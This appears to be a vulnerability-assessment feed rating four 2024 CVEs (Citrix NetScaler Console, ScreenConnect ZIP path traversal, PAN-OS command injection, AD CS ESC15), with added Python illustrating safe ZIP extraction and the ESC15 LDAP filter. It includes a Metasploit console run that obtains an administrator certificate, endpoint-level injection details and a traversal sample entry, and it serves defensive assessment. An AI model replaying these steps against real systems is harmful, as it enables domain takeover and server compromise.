Activity Feed

2
Ratings
  • Attacker Value
    Medium
  • Exploitability
    Medium
Technical Analysis

CVE-2024-6235 is a critical information disclosure vulnerability in Citrix NetScaler Console. The vulnerability, which was patched in July of 2024, affects Citrix NetScaler Console 14.1 (also known as Citrix NetScaler ADM 14.1) before 14.1-25.53. A brief investigation of the vulnerability indicated that exploitability is lower than one might expect for a critical vulnerability in a Citrix product. It appears that exploitation requires an adjacent network position on the LAN, since the management web service for NetScaler Console/ADM does not appear to be affected. This indicates that CVE-2024-6235 is most likely to be exploited for lateral movement, likely via an agent communication service port or outbound LAN-focused discovery. Furthermore, no public PoC is available, as of December 5, 2024, and the vulnerability does not appear to be trivial to exploit; the vulnerability has not been reported as EITW. For these reasons, attacker value and exploitability have been deemed ‘Moderate’.

2
Ratings
  • Attacker Value
    High
  • Exploitability
    Very High
Technical Analysis

CVE-2024-1708 is a path traversal vulnerability affecting ConnectWise ScreenConnect. A technical analysis is available here.

The vulnerability occurs when installing a new extension (i.e. a plugin) on a vulnerable ScreenConnect target. An extension is delivered as a ZIP file, and an authenticated administrator can install a new extension by making an HTTP POST request to the /Services/ExtensionService.ashx/InstallExtension endpoint, supplying the contents of the ZIP as part of the request.

By default new extensions are stored in the folder C:\Program Files (x86)\ScreenConnect\App_Extensions\ on Windows, and /opt/screenconnect/App_Extensions/ on Linux. An extension will be identified on the system using a GUID, and will reside in the App_Extensions folder under a new folder named with the GUID value of the extension.

When installing a new extension, ScreenConnect extracts the contents of a ZIP file to the extension's GUID folder in the App_Extensions folder. However, ZIP file extraction honors double dot path segments (e.g. \..\ on Windows, or /../ on Linux), allowing arbitrary files held in the ZIP file to be extracted to arbitrary locations on the target system due to path traversal.

When writing the Metasploit exploit for CVE-2024-1709, I leveraged CVE-2024-1708 to write an attacker-controlled ASHX (a form of ASP.NET) payload to the App_Extensions folder.

CISA rated this vulnerability with a CVSS score of 8.4 (High). Notably, their rating sets the User Interaction to be Required, and the Scope to be Changed. Based on my writing of the Metasploit exploit module, user interaction is not required. Additionally, the scope is not changed through this vulnerability, as this vulnerability is authenticated, and requires an attacker to already have administrator privileges, for example, via CVE-2024-1709. The vulnerability that gets an attacker administrator privileges (i.e. CVE-2024-1709) should mark the Scope as Changed. A rating of 7.2 (High) would seem to better reflect the impact of CVE-2024-1708.

I have rated the exploitability of CVE-2024-1708 as Very High, as the steps to exploit the path traversal are both easy to perform and reliable in practice. I have rated the attacker value as High and not Very High, as this vulnerability requires authentication.
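The ZIP extraction flaw described in this assessment is the classic "zip slip" pattern. As an added illustration, not code from ScreenConnect or from the Metasploit module, the following Python builds a constructed archive (one benign file plus an entry named with Windows-style "\..\" segments), shows where an unvalidated join would land that entry relative to the extension's GUID folder, and contrasts it with an extractor that rejects any entry whose name or resolved destination escapes the folder. File names, the GUID value and the archive contents are all made up for the demonstration.

```python
import io
import os
import tempfile
import zipfile
from pathlib import PurePosixPath
from typing import Dict, List, Tuple

# Constructed sample archive (not a real ScreenConnect extension): one benign
# file plus one entry whose name climbs out of the extension's GUID folder
# using the Windows-style "\..\" segments the assessment describes.
BENIGN_NAME = "Manifest.xml"
TRAVERSAL_NAME = "..\\..\\evil.ashx"


def build_sample_zip() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(BENIGN_NAME, "<Manifest/>")
        zf.writestr(TRAVERSAL_NAME, "placeholder contents")
    return buf.getvalue()


def _as_posix(name: str) -> str:
    # Treat backslashes as separators too: a check that only knows "/" would
    # let "..\..\x" through as a single odd-looking file name.
    return name.replace("\\", "/")


def is_unsafe_entry(name: str) -> bool:
    """True for absolute paths, drive-letter prefixes and any '..' segment."""
    p = PurePosixPath(_as_posix(name))
    if p.is_absolute():
        return True
    if p.parts and p.parts[0].endswith(":"):
        return True
    return ".." in p.parts


def naive_target(root: str, name: str) -> str:
    """Where an unvalidated join lands the entry (the vulnerable behaviour)."""
    return os.path.normpath(os.path.join(root, _as_posix(name)))


def extract_safely(zip_bytes: bytes, root: str) -> Tuple[List[str], List[str]]:
    """Extract entries under root, refusing any that would escape it.

    Returns (written, rejected) entry names. The name check is backed by a
    check on the resolved destination, so symlinked directories or odd
    separator mixes cannot sidestep the string test.
    """
    written: List[str] = []
    rejected: List[str] = []
    root_real = os.path.realpath(root)
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            name = info.filename
            if is_unsafe_entry(name):
                rejected.append(name)
                continue
            dest = os.path.realpath(os.path.join(root_real, _as_posix(name)))
            if dest != root_real and not dest.startswith(root_real + os.sep):
                rejected.append(name)
                continue
            if name.endswith("/"):  # directory entry
                os.makedirs(dest, exist_ok=True)
                continue
            os.makedirs(os.path.dirname(dest), exist_ok=True)
            with zf.open(info) as src, open(dest, "wb") as dst:
                dst.write(src.read())
            written.append(name)
    return written, rejected


def demo() -> Dict[str, object]:
    """Run both behaviours against the sample archive in a scratch directory."""
    zip_bytes = build_sample_zip()
    with tempfile.TemporaryDirectory() as tmp:
        # Constructed GUID folder name, mirroring the App_Extensions layout.
        guid_dir = os.path.join(tmp, "App_Extensions", "00000000-0000-0000-0000-000000000000")
        os.makedirs(guid_dir)
        written, rejected = extract_safely(zip_bytes, guid_dir)
        landing = naive_target(guid_dir, TRAVERSAL_NAME)
        return {
            "written": written,
            "rejected": rejected,
            "naive_landing": landing,
            "naive_escapes_root": not landing.startswith(guid_dir + os.sep),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The two checks are deliberately redundant: the name test documents the rule (no absolute paths, no drive letters, no ".." segments, backslashes count as separators), and the realpath test catches anything the name test cannot see, such as a pre-existing symlink inside the extraction root.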

1
Ratings
Technical Analysis

CVE-2024-9474 was exploited in the wild as part of an exploit chain, paired with the authentication bypass CVE-2024-0012, to allow for unauthenticated RCE. On its own, CVE-2024-9474 would require authentication.

A technical analysis of CVE-2024-9474 shows this vulnerability is a command injection, allowing an attacker to execute arbitrary OS commands with root privileges.

An attacker can make a POST request to the /php/utils/createRemoteAppwebSession.php endpoint, which will create a new PHP session, returning a new PHPSESSID cookie. This POST request allows an attacker to supply an arbitrary username for the new session. The username value will be stored in a session object. A second HTTP request, for example to /index.php, can then trigger the command injection when the function AuditLog.write is called, and the poisoned username value from the new session is passed to a call to pexecute, and a command injection can be achieved.

A Metasploit exploit module for the exploit chain comprising the auth bypass CVE-2024-0012 and the command injection CVE-2024-9474 is available. Based on writing this exploit module, I have rated both the attacker value and the exploitability of this as high, as a target PAN-OS management interface is vulnerable in a default configuration, and compromising a PAN-OS device is a high value target for an attacker; however, this vulnerability is authenticated, so it needs to be paired with an auth bypass.

1
Ratings
  • Attacker Value
    High
  • Exploitability
    High
Technical Analysis

This vulnerability is also known as ESC15 and EKUwu.

Overview

Microsoft’s Active Directory Certificate Services (AD CS) is affected by a vulnerability whereby certificate templates using schema version 1 allow the requester to specify the application policies in the form of OIDs to be included in the signed certificate. When combined with the ability to specify the Certificate Request Agent OID (1.3.6.1.4.1.311.20.2.1) an attacker can request authentication certificates for any user using the built-in, default, User template. While the built-in, default WebServer template is technically vulnerable to this flaw, the default privileges restrict enrollment to the privileged Domain Admins and Enterprise Admins groups. An attacker would need to identify a published certificate template that they have the necessary permission to enroll with that uses schema version 1. This is relatively easy to identify by using the following LDAP query and then inspecting the enrollment permissions.

(&
    (objectclass=pkicertificatetemplate)
    (!(mspki-enrollment-flag:1.2.840.113556.1.4.804:=2))
    (|(mspki-ra-signature=0)(!(mspki-ra-signature=*)))
    (pkiextendedkeyusage=*)
    (mspki-certificate-name-flag:1.2.840.113556.1.4.804:=1)
    (mspki-template-schema-version=1)
)

IOCs

When certificates are issued, a record is kept on the CA. An administrator can view issued certificates using certsrv.msc, navigating to the CA then selecting “Issued Certificates”. Look for the Certificate template that is vulnerable and inspect instances in which it was issued as these could indicate a malicious user has leveraged this flaw.

Disclosure

The vulnerability was first hinted at on the X (formerly Twitter) social media platform by the members of the TrustedSec team who discovered it. Through private conversations, the details began to slowly leak to a larger audience. The details became public on October 7th, 2024 when dru1d-foofus opened a pull request containing a functioning PoC to the popular Certipy repository. The next day, TrustedSec released a blog and detailed writeup regarding the vulnerability. At this time it was unclear whether or not Microsoft would issue a CVE for the vulnerability. Most ESC flaws have not had CVEs issued to identify them. On November 12th, 2024 Microsoft released a patch for this flaw which they issued as CVE-2024-49019.

Exploitation

This vulnerability is exploitable with Metasploit version 6.4.32 using the icpr_cert module and the ADD_CERT_APP_POLICY datastore option.

msf6 auxiliary(admin/dcerpc/icpr_cert) > set RHOSTS 172.30.239.85
RHOSTS => 172.30.239.85
msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBUser normaluser
SMBUser => normaluser
msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBDomain COLLALABS1
SMBDomain => COLLALABS1
msf6 auxiliary(admin/dcerpc/icpr_cert) > set SMBPass normalpass
SMBPass => normalpass
msf6 auxiliary(admin/dcerpc/icpr_cert) > set CA collalabs1-SRV-ADDS01-CA
CA => collalabs1-SRV-ADDS01-CA
msf6 auxiliary(admin/dcerpc/icpr_cert) > set CERT_TEMPLATE ESC15-Test
CERT_TEMPLATE => ESC15-Test
msf6 auxiliary(admin/dcerpc/icpr_cert) > set ADD_CERT_APP_POLICY 1.3.6.1.4.1.311.20.2.1
ADD_CERT_APP_POLICY => 1.3.6.1.4.1.311.20.2.1
msf6 auxiliary(admin/dcerpc/icpr_cert) > run
[*] Running module against 172.30.239.85
[*] 172.30.239.85:445 - Requesting a certificate...
[+] 172.30.239.85:445 - The requested certificate was issued.
[*] 172.30.239.85:445 - Certificate UPN: administrator@collalabs1.local
[*] 172.30.239.85:445 - Certificate Policies:
[*] 172.30.239.85:445 -   * 1.3.6.1.4.1.311.20.2.1 (Certificate Request Agent)
[*] 172.30.239.85:445 - Certificate stored at: /home/normaluser/.msf4/loot/20241009172714_default_172.30.239.85_windows.ad.cs_659672.pfx
[*] Auxiliary module execution completed
msf6 auxiliary(admin/dcerpc/icpr_cert) >
Indicated sources as
  • Personally observed in an environment
  • Other: Rapid7 MDR has observed exploitation of this vulnerability in one or more customer environments
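The LDAP query in the ESC15 assessment above is compact but easy to misread, in particular the two clauses that use the bitwise-AND matching rule 1.2.840.113556.1.4.804. As an added example, not code from Rapid7, Metasploit or Certipy, the following Python applies the same six conditions to template entries held in memory and reports which clause each non-matching template fails, which is what an auditor wants when reviewing an export of template objects offline. The two flag constants are the documented AD CS values (CT_FLAG_PEND_ALL_REQUESTS = 0x2 in msPKI-Enrollment-Flag, CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1 in msPKI-Certificate-Name-Flag); the template entries are constructed for the demonstration and their attribute values are illustrative, not copied from any real forest.

```python
from typing import Any, Dict, List

# Flag bits the query tests through the bitwise-AND matching rule
# (1.2.840.113556.1.4.804). Both are the documented AD CS flag values.
CT_FLAG_PEND_ALL_REQUESTS = 0x2          # msPKI-Enrollment-Flag: CA manager approval
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x1  # msPKI-Certificate-Name-Flag: requester picks subject

# Constructed template entries: keys mirror the LDAP attribute names
# (lowercased); values are illustrative and not taken from a real forest.
SAMPLE_TEMPLATES: List[Dict[str, Any]] = [
    {"cn": "ESC15-Test", "objectclass": ["top", "pKICertificateTemplate"],
     "mspki-template-schema-version": 1, "mspki-enrollment-flag": 0,
     "mspki-certificate-name-flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
     "pkiextendedkeyusage": ["1.3.6.1.5.5.7.3.1"]},        # Server Authentication EKU
    {"cn": "NeedsApproval", "objectclass": ["top", "pKICertificateTemplate"],
     "mspki-template-schema-version": 1,
     "mspki-enrollment-flag": CT_FLAG_PEND_ALL_REQUESTS,
     "mspki-certificate-name-flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
     "pkiextendedkeyusage": ["1.3.6.1.5.5.7.3.1"]},
    {"cn": "SchemaV2", "objectclass": ["top", "pKICertificateTemplate"],
     "mspki-template-schema-version": 2, "mspki-enrollment-flag": 0,
     "mspki-certificate-name-flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
     "pkiextendedkeyusage": ["1.3.6.1.5.5.7.3.1"]},
    {"cn": "SubjectFromAD", "objectclass": ["top", "pKICertificateTemplate"],
     "mspki-template-schema-version": 1, "mspki-enrollment-flag": 0,
     "mspki-certificate-name-flag": 0,                      # subject built from AD, not supplied
     "pkiextendedkeyusage": ["1.3.6.1.5.5.7.3.2"]},        # Client Authentication EKU
    {"cn": "CoSignRequired", "objectclass": ["top", "pKICertificateTemplate"],
     "mspki-template-schema-version": 1, "mspki-enrollment-flag": 0,
     "mspki-ra-signature": 1,                               # one authorised signature needed
     "mspki-certificate-name-flag": CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
     "pkiextendedkeyusage": ["1.3.6.1.5.5.7.3.1"]},
]


def why_not(entry: Dict[str, Any]) -> List[str]:
    """Return the filter clauses this entry fails; an empty list means it matches.

    A missing attribute is treated as absent, exactly as LDAP does: (attr=*)
    is false, the bitwise matching rule is false, and so (!(...)) is true.
    """
    reasons: List[str] = []
    classes = [c.lower() for c in entry.get("objectclass", [])]
    if "pkicertificatetemplate" not in classes:
        reasons.append("not a pKICertificateTemplate object")
    if entry.get("mspki-enrollment-flag", 0) & CT_FLAG_PEND_ALL_REQUESTS:
        reasons.append("CA manager approval required (enrollment flag bit 0x2)")
    if entry.get("mspki-ra-signature") not in (None, 0):
        reasons.append("authorised signatures required (msPKI-RA-Signature > 0)")
    if not entry.get("pkiextendedkeyusage"):
        reasons.append("no extended key usage defined")
    if not entry.get("mspki-certificate-name-flag", 0) & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT:
        reasons.append("enrollee does not supply the subject (name flag bit 0x1 clear)")
    if entry.get("mspki-template-schema-version") != 1:
        reasons.append("schema version is not 1")
    return reasons


def find_candidates(entries: List[Dict[str, Any]]) -> List[str]:
    """Names of the templates the query would return, in input order."""
    return [e["cn"] for e in entries if not why_not(e)]


if __name__ == "__main__":
    for entry in SAMPLE_TEMPLATES:
        verdict = why_not(entry)
        print(f"{entry['cn']}: {'CANDIDATE' if not verdict else '; '.join(verdict)}")
```

As the assessment notes, a match is only a candidate: the template's enrollment permissions still have to be checked, since the query says nothing about who may enroll. The ESC15-Test entry here is named after the template used in the console transcript above, but its attribute values are constructed.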